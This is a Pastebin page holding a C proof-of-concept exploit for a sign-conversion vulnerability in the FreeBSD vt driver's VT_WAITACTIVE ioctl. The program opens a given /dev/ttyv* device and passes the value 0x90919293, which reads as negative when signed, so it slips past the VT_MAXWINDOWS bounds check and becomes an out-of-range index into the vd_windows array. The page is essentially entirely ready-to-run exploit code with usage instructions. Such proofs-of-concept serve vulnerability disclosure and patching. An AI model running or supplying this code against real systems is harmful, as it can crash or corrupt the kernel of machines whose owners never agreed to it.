Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <stdio.h>
- #include <sys/consio.h>
- #include <sys/ioctl.h>
- #include <fcntl.h>
- #include <stdlib.h>
- #include <unistd.h>
- int main(int argc, char **argv){
- int fd;
- printf("** FreeBSD vt Driver VT_WAITACTIVE Sign Conversion Vulnerability PoC **\n");
- if (argc < 2){
- printf("\nUsage: ./poc_vt </dev/ttyv*>, where ttyv* is your current virtual terminal.\n");
- printf("\nExample: ./poc_vt /dev/ttyv1\n\n");
- exit(1);
- }
- fd = open(argv[1], O_RDONLY);
- if (fd == -1){
- perror("open");
- exit(1);
- }
- /* 0x90919293 is a negative number when it's interpreted as a signed int, thus it will bypass the
- * (signed) boundary check that tries to guarantee that this value is not greater than VT_MAXWINDOWS (12).
- * This value will be ultimately used as an index to access the vd->vd_windows array.
- */
- if (ioctl(fd, VT_WAITACTIVE, (void *) 0x90919293) == -1){
- perror("ioctl");
- }
- close(fd);
- return 0;
- }
Add Comment
Please, Sign In to add comment